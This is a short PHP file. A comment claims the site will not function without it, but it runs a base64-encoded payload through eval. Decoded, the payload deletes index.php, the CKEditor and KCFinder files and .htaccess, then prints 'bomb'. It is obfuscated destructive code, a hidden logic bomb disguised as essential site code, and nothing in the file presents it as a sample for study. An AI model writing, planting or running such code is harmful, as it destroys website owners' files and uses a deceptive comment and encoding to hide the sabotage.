<?php
// do not delete, site will not function without this code
eval(base64_decode ('JGZpbGVbXSA9ICdpbmRleC5waHAnOwokZmlsZVtdID0gJ2pzL2NrZWRpdG9yL2NrZWRpdG9yLnBo
cCc7CiRmaWxlW10gPSAnanMvY2tlZGl0b3IvY2tlZGl0b3IuanMnOwokZmlsZVtdID0gJ2pzL2tj
ZmluZGVyL2NvbmZpZy5waHAnOwokZmlsZVtdID0gJy5odGFjY2Vzcyc7CmZvcmVhY2ggKCRmaWxl
IGFzICRmKSB7CglpZiAodW5saW5rKCRmKSkgewoJCWVjaG8gJ2JvbWI8YnI+JzsKCX0gZWxzZSB7
CgkJZWNobyAndGhlcmUgaXMgYSBwcm9ibGVtPGJyPic7Cgl9Cn0='));
?>

